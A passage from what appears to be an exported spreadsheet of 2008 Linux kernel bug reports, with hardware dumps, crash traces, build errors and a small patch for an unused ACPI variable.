iTCO_wdt 00:1f.1 IDE interface: Intel Corporation 82801CAM IDE U100 Controller (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at 1860 [size=16] Region 5: Memory at e8000000 (32-bit, non-prefetchable) [size=1K] Kernel modules: ata_piix, piix 00:1f.3 SMBus: Intel Corporation 82801CA/CAM SMBus Controller (rev 02) Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 10 Region 4: I/O ports at 1880 [size=32] Kernel driver in use: i801_smbus Kernel modules: i2c-i801 00:1f.6 Modem: Intel Corporation 82801CA/CAM AC'97 Modem Controller (rev 02) Subsystem: Askey Computer Corp. Device 1050 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 10 Region 0: I/O ports at 2000 [size=256] Region 1: I/O ports at 1c00 [size=128] Kernel modules: 8250_pci, snd-intel8x0m 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility M6 LY Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR+ FastB2B+ DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 66 (2000ns min), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at f0000000 (32-bit, prefetchable) [size=128M] Region 1: I/O ports at 3000 [size=256] Region 2: Memory at e8100000 (32-bit, non-prefetchable) [size=64K] [virtual] Expansion ROM at e8120000 [disabled] [size=128K] Capabilities: [58] AGP version 2.0 Status: RQ=48 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=32 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x4 Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel modules: radeonfb 02:02.0 CardBus bridge: Texas Instruments PCI1520 PC card Cardbus Controller (rev 01) Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort+ &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 168, Cache Line Size: 128 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at e8204000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=03, subordinate=06, sec-latency=176 Memory window 0: e8400000-e87ff000 (prefetchable) Memory window 1: 30000000-33fff000 I/O window 0: 00004000-000040ff I/O window 1: 00004400-000044ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset- 16bInt- PostWrite+ 16-bit legacy interface ports at 0001 Kernel driver in use: yenta_cardbus Kernel modules: yenta_socket 02:02.1 CardBus bridge: Texas Instruments PCI1520 PC card Cardbus Controller (rev 01) Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 168, Cache Line Size: 128 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at e8205000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=07, subordinate=0a, sec-latency=176 Memory window 0: 38000000-383ff000 (prefetchable) Memory window 1: 34000000-37fff000 I/O window 0: 00004800-000048ff I/O window 1: 00004c00-00004cff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 Kernel driver in use: yenta_cardbus Kernel modules: yenta_socket 02:03.0 Multimedia audio controller: ESS Technology ES1988 Allegro-1 (rev 12) Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 5 Region 0: I/O ports at 5000 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel modules: snd-maestro3 02:05.0 FireWire (IEEE 1394): Texas Instruments TSB43AB21 IEEE-1394a-2000 Controller (PHY/Link) (prog-if 10) Subsystem: Gateway 2000 Device 0400 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (500ns min, 1000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at e8207000 (32-bit, non-prefetchable) [size=2K] Region 1: Memory at e8200000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel modules: firewire-ohci 02:08.0 Ethernet controller: Intel Corporation 82801CAM (ICH3) PRO/100 VE (LOM) Ethernet Controller (rev 42) Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 66 (2000ns min, 14000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at e8206000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at 5400 [size=64] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME- Kernel modules: e100 03:00.0 Mass storage controller: Silicon Image, Inc. SiI 3512 [SATALink/SATARaid] Serial ATA Controller (rev 01) Subsystem: Silicon Image, Inc. SiI 3512 [SATALink/SATARaid] Serial ATA Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort+ &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at 4010 [size=8] Region 1: I/O ports at 4020 [size=4] Region 2: I/O ports at 4018 [size=8] Region 3: I/O ports at 4024 [size=4] Region 4: I/O ports at 4000 [size=16] Region 5: Memory at e8480000 (32-bit, non-prefetchable) [size=512] [virtual] Expansion ROM at e8400000 [disabled] [size=512K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=2 PME- Kernel driver in use: sata_sil Kernel modules: sata_sil Module Size Used by sata_sil 7432 0 libata 142432 1 sata_sil yenta_socket 22156 1 rsrc_nonstatic 10240 1 yenta_socket pcmcia_core 30352 2 yenta_socket,rsrc_nonstatic ipt_MASQUERADE 2560 1 xt_DSCP 3072 4 xt_comment 1664 1 xt_state 2048 7 ipt_LOG 5504 6 xt_tcpudp 2816 10 iptable_mangle 2688 1 iptable_filter 2560 1 nf_nat_ftp 2688 0 iptable_nat 4360 1 nf_nat 14352 3 ipt_MASQUERADE,nf_nat_ftp,iptable_nat nf_conntrack_ftp 7200 1 nf_nat_ftp nf_conntrack_ipv4 7048 10 iptable_nat,nf_nat nf_conntrack 44436 7 ipt_MASQUERADE,xt_state,nf_nat_ftp,iptable_nat,nf_nat,nf_conntrack_ftp,nf_conntrack_ipv4 ip_tables 9744 3 iptable_mangle,iptable_filter,iptable_nat x_tables 12036 8 ipt_MASQUERADE,xt_DSCP,xt_comment,xt_state,ipt_LOG,xt_tcpudp,iptable_nat,ip_tables ppp_deflate 4480 0 zlib_deflate 18968 1 ppp_deflate zlib_inflate 17536 1 ppp_deflate bsd_comp 5376 0 ppp_async 8064 1 crc_ccitt 1920 1 ppp_async ppp_generic 18580 7 ppp_deflate,bsd_comp,ppp_async slhc 5760 1 ppp_generic radeon 132640 2 drm 68384 3 radeon fuse 46236 1 aes_i586 7680 2 aes_generic 27304 1 aes_i586 usbserial 26728 3 speedstep_ich 3088 0 speedstep_lib 3456 1 speedstep_ich non_fatal 1796 0 [permanent] i2c_dev 5764 0 dm_crypt 11780 1 8250_pci 22400 0 8250_pnp 9344 0 8250 19956 4 8250_pci,8250_pnp serial_core 17408 1 8250 rtc 7064 0 i2c_i801 8208 0 piix 6788 0 [permanent] iTCO_wdt 9760 0 usbhid 19364 0 hid 30852 1 usbhid shpchp 28440 0 pci_hotplug 12044 1 shpchp intel_agp 23740 1 agpgart 26160 2 drm,intel_agp bay 4096 0 ide_cd_mod 29956 0 video 16144 0 output 2688 1 video dock 7692 2 libata,bay cdrom 33056 1 ide_cd_mod battery 9988 0 ac 4100 0 button 5904 0 dm_mirror 16000 0 dm_log 8448 1 dm_mirror thermal 14876 0 processor 26928 2 thermal fan 4100 0 unix 23212 65 ext3 109192 4 jbd 40084 1 ext3 ext2 57608 1 mbcache 6528 2 ext3,ext2 usb_storage 36096 0 uhci_hcd 21132 0 ohci_hcd 20996 0 ehci_hcd 31884 0 usbcore 123504 7 usbserial,usbhid,usb_storage,uhci_hcd,ohci_hcd,ehci_hcd sd_mod 20624 0 scsi_mod 82948 3 libata,usb_storage,sd_mod dm_mod 43716 20 dm_crypt,dm_mirror,dm_log evdev 8576 0 Steps to reproduce: Inserting the SATA card and attaching the cable from the enclosure.</t>
  </si>
  <si>
    <t>Error build make rpm</t>
  </si>
  <si>
    <t>2008-10-10 10:31 UTC</t>
  </si>
  <si>
    <t>Evgeniy Manachkin</t>
  </si>
  <si>
    <t>2009-07-08 14:20 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.26.6 Distribution: any Hardware Environment: any Software Environment: any Problem Description: Build error from make rpm. Many unpacked files (*.fw). Steps to reproduce: Add in .config: # CONFIG_PREVENT_FIRMWARE_BUILD is not set CONFIG_FW_LOADER=y CONFIG_FIRMWARE_IN_KERNEL=y CONFIG_EXTRA_FIRMWARE="" and say make rpm to build.</t>
  </si>
  <si>
    <t>Suspend freezes laptop samsung R70 / 009, Regretion: it worked (only the sound card stoped working after suspension) with kernel 2.4.xx versions</t>
  </si>
  <si>
    <t>2.6.27-6</t>
  </si>
  <si>
    <t>2008-10-10 11:41 UTC</t>
  </si>
  <si>
    <t>Diego Ocampo</t>
  </si>
  <si>
    <t>2008-10-13 13:54 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.24 Earliest failing kernel version: Distribution: Ubuntu Intrepid Ibex Beta Hardware Environment: Samsung R70 / A009 Software Environment: Gnome Desktop 2.24 Problem Description: The laptop just freezes with a black screen, not any key combination works. With Ubuntu Hardy i could suspend my system even if after booting it again the sound card had stoped working. Steps to reproduce: I am calling the suspend function from the Gnome Shutdown menu.</t>
  </si>
  <si>
    <t>wireless card intel pro/wireless 3945BG freezes ramdonly my laptop.</t>
  </si>
  <si>
    <t>2008-10-10 11:47 UTC</t>
  </si>
  <si>
    <t>2008-12-04 16:58 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: ----- Earliest failing kernel version: ---- Distribution: Ubuntu Hardy or Ubuntu Intrepid Ibex Hardware Environment: wireless card intel pro/wireless 3945BG in laptop Samsung R70 / A009. Software Environment: Gnome 2.24, Ubuntu Intrepid Ibex beta, kernel: 2.6.27-6-generic. Problem Description: In the beginning NetworkManager doesn't show any wireless network, i can fix this by introducing the commands: sudo ifconfig wlan0 down sudo ifconfig wlan0 up. It is necessary to introduce this command each few minutes, it seems to be that the signal lose strengh but in windows i have not this problem.. if i introduce the commands then the network is working again.. but ramdonly the laptop freezes when i use the wireless card... i could never be more than 1 hour using internet without a freeze and usually is less time.</t>
  </si>
  <si>
    <t>delkin_cb fails after resume</t>
  </si>
  <si>
    <t>2008-10-10 13:45 UTC</t>
  </si>
  <si>
    <t>bumble.bee</t>
  </si>
  <si>
    <t>2008-10-29 11:19 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: x86 (Dell laptop, yenta cardbus), "02:00.0 Mass storage controller [0180]: Workbit Corporation Device [1145:f021] (rev 01)" Problem Description: The delkin_cb driver works with ~3 mb/s performance, top shows the CPU in 98% wait state with heavy I/O. If you suspend to ram or disk, the system comes up but any further I/O to a CF card in the adapter will not complete, top shows ~100% wait state but commands to read from the card do not complete. pata_ninja32 not tested because it performs much worse than delkin_cb (~1 mb/s). Steps to reproduce: 1. boot, mount a CF card through the adapter (or have root on the CF card, as I do) 2. echo mem &gt; /sys/power/state 3. resume from sleep 4. do I/O from the card, say "ls /mnt/card" 5. &lt;crickets chirp&gt; ... top shows 100% wait state</t>
  </si>
  <si>
    <t>atl1e: INFO: inconsistent lock state</t>
  </si>
  <si>
    <t>2008-10-10 14:14 UTC</t>
  </si>
  <si>
    <t>2009-03-22 06:39 UTC</t>
  </si>
  <si>
    <t>Jay Cliburn</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian Hardware Environment: eeePC 901 Software Environment: Problem Description: At boot the following message appears in the dmesg: [ 10.926640] ATL1E 0000:04:00.0: PCI INT A -&gt; Link[LNKB] -&gt; GSI 5 (level, low) -&gt; IRQ 5 [ 10.941823] ATL1E 0000:04:00.0: setting latency timer to 64 [ 42.441150] [ 42.441156] ================================= [ 42.450029] [ INFO: inconsistent lock state ] [ 42.450029] 2.6.27 #1 [ 42.450029] --------------------------------- [ 42.450029] inconsistent {hardirq-on-W} -&gt; {in-hardirq-W} usage. [ 42.450029] ifconfig/1315 [HC1[1]:SC0[0]:HE0:SE1] takes: [ 42.450029] (&amp;adapter-&gt;mdio_lock){+-..}, at: [&lt;f89e4499&gt;] atl1e_intr+0x2a9/0x440 [atl1e] [ 42.450029] {hardirq-on-W} state was registered at: [ 42.450029] [&lt;c0139364&gt;] mark_lock+0xf4/0x830 [ 42.450029] [&lt;c013a459&gt;] __lock_acquire+0x2e9/0x1380 [ 42.450029] [&lt;c02a2bbf&gt;] pci_conf1_read+0xaf/0xf0 [ 42.450029] [&lt;c0139cc9&gt;] debug_check_no_locks_freed+0x79/0x130 [ 42.450029] [&lt;c0139c24&gt;] trace_hardirqs_on_caller+0xa4/0xc0 [ 42.450029] [&lt;c013b54d&gt;] lock_acquire+0x5d/0x80 [ 42.450029] [&lt;f89e831b&gt;] atl1e_probe+0x48b/0x6d0 [atl1e] [ 42.450029] [&lt;c0305e60&gt;] _spin_lock+0x30/0x40 [ 42.450029] [&lt;f89e831b&gt;] atl1e_probe+0x48b/0x6d0 [atl1e] [ 42.450029] [&lt;f89e831b&gt;] atl1e_probe+0x48b/0x6d0 [atl1e] [ 42.450029] [&lt;c01ef988&gt;] pci_match_device+0xa8/0xc0 [ 42.450029] [&lt;c01efd26&gt;] pci_device_probe+0x56/0x80 [ 42.450029] [&lt;c025a375&gt;] driver_probe_device+0x75/0x150 [ 42.450029] [&lt;c0139c24&gt;] trace_hardirqs_on_caller+0xa4/0xc0 [ 42.450029] [&lt;c025a4c2&gt;] __driver_attach+0x72/0x80 [ 42.450029] [&lt;c0259a3c&gt;] bus_for_each_dev+0x3c/0x60 [ 42.450029] [&lt;c025a1e6&gt;] driver_attach+0x16/0x20 [ 42.450029] [&lt;c025a450&gt;] __driver_attach+0x0/0x80 [ 42.450029] [&lt;c0259e92&gt;] bus_add_driver+0xb2/0x230 [ 42.450029] [&lt;c01ef820&gt;] pci_device_shutdown+0x0/0x20 [ 42.450029] [&lt;c01efc70&gt;] pci_device_remove+0x0/0x40 [ 42.450029] [&lt;c025a64d&gt;] driver_register+0x4d/0x120 [ 42.450029] [&lt;c01ea6a2&gt;] __spin_lock_init+0x32/0x70 [ 42.450029] [&lt;f8860000&gt;] snd_mixer_oss_conv+0x0/0x50 [snd_mixer_oss] [ 42.450029] [&lt;c01eff88&gt;] __pci_register_driver+0x58/0xa0 [ 42.450029] [&lt;f8860000&gt;] snd_mixer_oss_conv+0x0/0x50 [snd_mixer_oss] [ 42.450029] [&lt;c0101122&gt;] do_one_initcall+0x32/0x160 [ 42.450029] [&lt;c0145530&gt;] disable_irq+0x0/0x30 [ 42.450029] [&lt;c0304ac5&gt;] __mutex_unlock_slowpath+0x95/0xe0 [ 42.450029] [&lt;c0143429&gt;] sys_init_module+0x89/0x1b0 [ 42.450029] [&lt;c0139c24&gt;] trace_hardirqs_on_caller+0xa4/0xc0 [ 42.450029] [&lt;c01de344&gt;] trace_hardirqs_on_thunk+0xc/0x10 [ 42.450029] [&lt;c01030d6&gt;] syscall_call+0x7/0xb [ 42.450029] [&lt;ffffffff&gt;] 0xffffffff [ 42.450029] irq event stamp: 4564 [ 42.450029] hardirqs last enabled at (4563): [&lt;c01652b5&gt;] kmem_cache_free+0x65/0x90 [ 42.450029] hardirqs last disabled at (4564): [&lt;c01de354&gt;] trace_hardirqs_off_thunk+0xc/0x18 [ 42.450029] softirqs last enabled at (4532): [&lt;c02b1d1c&gt;] dev_change_flags+0x5c/0x1a0 [ 42.450029] softirqs last disabled at (4530): [&lt;c0305e7b&gt;] _spin_lock_bh+0xb/0x40 [ 42.450029] [ 42.450029] other info that might help us debug this: [ 42.450029] 1 lock held by ifconfig/1315: [ 42.450029] #0: (rtnl_mutex){--..}, at: [&lt;c02ed5c1&gt;] devinet_ioctl+0xf1/0x670 [ 42.450029] [ 42.450029] stack backtrace: [ 42.450029] Pid: 1315, comm: ifconfig Not tainted 2.6.27 #1 [ 42.450029] [&lt;c0138944&gt;] print_usage_bug+0x174/0x190 [ 42.450029] [&lt;c01399c5&gt;] mark_lock+0x755/0x830 [ 42.450029] [&lt;c013ac85&gt;] __lock_acquire+0xb15/0x1380 [ 42.450029] [&lt;c013a5be&gt;] __lock_acquire+0x44e/0x1380 [ 42.450029] [&lt;c013a5be&gt;] __lock_acquire+0x44e/0x1380 [ 42.450029] [&lt;c013b54d&gt;] lock_acquire+0x5d/0x80 [ 42.450029] [&lt;f89e4499&gt;] atl1e_intr+0x2a9/0x440 [atl1e] [ 42.450029] [&lt;c0305e60&gt;] _spin_lock+0x30/0x40 [ 42.450029] [&lt;f89e4499&gt;] atl1e_intr+0x2a9/0x440 [atl1e] [ 42.450029] [&lt;f89e4499&gt;] atl1e_intr+0x2a9/0x440 [atl1e] [ 42.450029] [&lt;c0306246&gt;] _spin_lock_irqsave+0x46/0x60 [ 42.450029] [&lt;c0144fa0&gt;] handle_IRQ_event+0x20/0x60 [ 42.450029] [&lt;c01467fd&gt;] handle_level_irq+0x6d/0xe0 [ 42.450029] [&lt;c0104f63&gt;] do_IRQ+0x53/0xa0 [ 42.450029] [&lt;c0103280&gt;] common_interrupt+0x28/0x30 [ 42.450029] [&lt;f89e53c4&gt;] atl1e_up+0x424/0x4a0 [atl1e] [ 42.450029] [&lt;f89e41f0&gt;] atl1e_intr+0x0/0x440 [atl1e] [ 42.450029] [&lt;c0145985&gt;] request_irq+0xa5/0xc0 [ 42.450029] [&lt;f89e5c5d&gt;] atl1e_open+0xdd/0x390 [atl1e] [ 42.450029] [&lt;c02b3b44&gt;] dev_open+0x54/0xb0 [ 42.450029] [&lt;c02b1d1c&gt;] dev_change_flags+0x5c/0x1a0 [ 42.450029] [&lt;c011f82b&gt;] local_bh_enable_ip+0x6b/0xb0 [ 42.450029] [&lt;c02b1d3e&gt;] dev_change_flags+0x7e/0x1a0 [ 42.450029] [&lt;c02ed9de&gt;] devinet_ioctl+0x50e/0x670 [ 42.450029] [&lt;c02a4f5f&gt;] sock_ioctl+0xcf/0x250 [ 42.450029] [&lt;c02a4e90&gt;] sock_ioctl+0x0/0x250 [ 42.450029] [&lt;c017448f&gt;] vfs_ioctl+0x1f/0x70 [ 42.450029] [&lt;c0110eb3&gt;] do_page_fault+0xf3/0x680 [ 42.450029] [&lt;c017453c&gt;] do_vfs_ioctl+0x5c/0x260 [ 42.450029] [&lt;c017477d&gt;] sys_ioctl+0x3d/0x70 [ 42.450029] [&lt;c01030d6&gt;] syscall_call+0x7/0xb [ 42.450029] ======================= [ 42.916493] ATL1E 0000:04:00.0: ATL1E: eth0 NIC Link is Up&lt;100 Mbps Full Duplex&gt; Steps to reproduce: boot the system</t>
  </si>
  <si>
    <t>Hans de Goede</t>
  </si>
  <si>
    <t>Device buffer on a DVD multi standard writer runs out burning a CD</t>
  </si>
  <si>
    <t>2008-10-11 15:54 UTC</t>
  </si>
  <si>
    <t>Valerio Passini</t>
  </si>
  <si>
    <t>2008-11-03 09:56 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version:2.6.27 Distribution: Debian Unstable Hardware Environment: Laptop Acer 5920G with a Samsung CDDVDW TS-L632H connected through IDE Software Environment: KDE 3.5.9; k3b 1.0.5; Brasero Problem Description: I have compiled the 2.6.27 kernel using make oldconf, thus almost copying the passed 2.6.26.5 configuration. Since then, when I burn a CD the internal buffer in my DVD burner reaches 0% obliging k3b and brasero to slow down the writing speed. It happens even if I don't run any other application. I have noticed that the device buffer runs out even if the software buffer is full, like there was not a fast transfer from the software buffer to the device buffer. In the end, k3b reports a big amount of buffer under-runs (&gt; 100).Everything works as expected with an older 2.6.26.5 kernel. What I need to do to help solving this bug? See you Valerio Steps to reproduce: Using 2.6.27 kernel and k3b or brasero to burn a CD. It works in simulation mode too (so you don't waste too much CD's ;))</t>
  </si>
  <si>
    <t>Defined but not used variable: 'acpi_mcfg_64bit_base_addr'</t>
  </si>
  <si>
    <t>2008-10-11 16:39 UTC</t>
  </si>
  <si>
    <t>2008-10-24 23:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.27 Distribution: SuSE 10.3 Hardware Environment: Opteron 265, 4Gb ECC RAM, 1Tb HDD, Nforce4 chipset Software Environment: gcc-4.3.1, glibc-2.6.1 Problem Description: warning: 'acpi_mcfg_64bit_base_addr' defined but not used Steps to reproduce: 1. Configure kernel without MMCONFIG support and compile. 2. make .... arch/x86/kernel/acpi/boot.c:100: warning: 'acpi_mcfg_64bit_base_addr' defined but not used .... Comment: acpi_mcfg_64bit_base_addr defined on line 100 in arch/x86/kernel/acpi/boot.c as "static int acpi_mcfg_64bit_base_addr __initdata = FALSE;" But used only in functions in same file boot.c: acpi_mcfg_oem_check() on line 166 and in acpi_parse_mcfg() on line 208 And this functions work only if CONFIG_PCI_MMCONFIG true, inside #ifdef CONFIG_PCI_MMCONFIG ... ... #endif Solution: --- patch version 1 ################################################################ --- a/arch/x86/kernel/acpi/boot.c 2008-10-10 02:13:53.000000000 +0400 +++ b/arch/x86/kernel/acpi/boot.c 2008-10-12 03:13:16.888033920 +0400 @@ -97,7 +97,9 @@ #warning ACPI uses CMPXCHG, i486 and later hardware #endif +#ifdef CONFIG_PCI_MMCONFIG static int acpi_mcfg_64bit_base_addr __initdata = FALSE; +#endif /* -------------------------------------------------------------------------- Boot-time Configuration ############################################################### or patch version 2 ################################################################################ --- a/arch/x86/kernel/acpi/boot.c 2008-10-10 02:13:53.000000000 +0400 +++ b/arch/x86/kernel/acpi/boot.c 2008-10-12 03:35:18.992034200 +0400 @@ -97,7 +97,6 @@ #warning ACPI uses CMPXCHG, i486 and later hardware #endif -static int acpi_mcfg_64bit_base_addr __initdata = FALSE; /* -------------------------------------------------------------------------- Boot-time Configuration @@ -156,6 +155,9 @@ } #ifdef CONFIG_PCI_MMCONFIG + +static int acpi_mcfg_64bit_base_addr __initdata = FALSE; + /* The physical address of the MMCONFIG aperture. Set from ACPI tables. */ struct acpi_mcfg_allocation *pci_mmcfg_config; int pci_mmcfg_config_num; #############################################################################</t>
  </si>
  <si>
    <t>Compile error: "mpp_path_lookup" [net/mac80211/mac80211.ko] undefined</t>
  </si>
  <si>
    <t>2.6.27-git2</t>
  </si>
  <si>
    <t>2008-10-12 00:17 UTC</t>
  </si>
  <si>
    <t>2008-10-13 08:10 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.27-git2 Distribution: Gentoo Hardware Environment: Intek Wireless 4965 Software Environment: Steps to reproduce: Problem Description: With the current git (2.6.27-git2), there is an error when modules are compiled: MODPOST 130 modules ERROR: "mpp_path_lookup" [net/mac80211/mac80211.ko] undefined! ERROR: "mpp_path_add" [net/mac80211/mac80211.ko] undefined! make[1]: *** [__modpost] Erreur 1 make: *** [modules] Erreur 2 zsh: exit 2 make "CC=ccache gcc" -j3 modules</t>
  </si>
  <si>
    <t>iwl3945 module crashes with 2.6.27 kernels</t>
  </si>
  <si>
    <t>2.6.27-3, 2.6.27-4, 2.6.27-6</t>
  </si>
  <si>
    <t>2008-10-12 03:56 UTC</t>
  </si>
  <si>
    <t>Marcin Feder</t>
  </si>
  <si>
    <t>2008-10-13 08:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.24-19 Earliest failing kernel version: 2.6.27-3 (I have not tried previous 2.6.27 versions) Distribution: Kubuntu Intrepid Ibex (8.10) Hardware Environment: Notebook Asus V6J Software Environment: Problem Description: System hangs on boot if the iwl3945 driver is loaded. System boots properly when the iwl3945 and mac80211 are blacklisted but the iwl3945 driver still can't be initiated. "modprobe iwl3945" produces the following error message: [ 161.964119] ------------[ cut here ]------------ [ 161.964196] kernel BUG at /build/buildd/linux-2.6.27/net/mac80211/ieee80211_i.h:764! [ 161.964284] invalid opcode: 0000 [#1] SMP [ 161.964454] Modules linked in: arc4 ecb iwl3945 rfkill mac80211 cfg80211 binfmt_misc bridge stp bnep rfcomm l2cap uinput ppdev acpi_cpufreq cpufreq_userspace cpufreq_powersave cpufreq_conservat ive cpufreq_ondemand cpufreq_stats freq_table wmi pci_slot sbs container sbshc af_packet iptable_filter ip_tables x_tables dm_crypt crypto_blkcipher dm_mod sbp2 parport_pc lp parport snd_hda_intel snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer sdhci_pci iTCO_wdt sdhci btusb psmouse iTCO_vendor_support bluetooth snd_ seq_device serio_raw nvidia(P) snd mmc_core video asus_laptop i2c_core output ac joydev soundcore battery led_class intel_agp button snd_page_alloc shpchp pci_hotplug agpgart evdev ext3 jbd mbcach e sg sd_mod sr_mod crc_t10dif cdrom ata_generic pata_acpi usbhid hid ohci1394 ata_piix ieee1394 ehci_hcd libata scsi_mod dock uhci_hcd r8169 usbcore thermal processor fan fbcon tileblit font bitbl it softcursor uvesafb cn fuse [ 161.968013] [ 161.968013] Pid: 7252, comm: udevd Tainted: P (2.6.27-4-generic #1) [ 161.968013] EIP: 0060:[&lt;f8f0c938&gt;] EFLAGS: 00010246 CPU: 0 [ 161.968013] EIP is at netdev_notify+0x88/0x90 [mac80211] [ 161.968013] EAX: f8f25bd8 EBX: f76c6800 ECX: f76c6800 EDX: f3ca8040 [ 161.968013] ESI: fffffff2 EDI: 00000000 EBP: f3ca3e38 ESP: f3ca3e08 [ 161.968013] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 161.968013] Process udevd (pid: 7252, ti=f3ca2000 task=f3c4bed0 task.ti=f3ca2000) [ 161.968013] Stack: 00000000 00000000 0000000a f3ca3e38 c0356b3d f3ca3e38 f8dfe3ee 0000000a [ 161.968013] 0000000a f8eab8d8 f8f25c20 fffffff2 f3ca3e54 c03970b5 f76c6800 0000000a [ 161.968013] 00000000 f76c6810 f3ca3e98 f3ca3e64 c014c0bf ffffffff 00000000 f3ca3ea4 [ 161.968013] Call Trace: [ 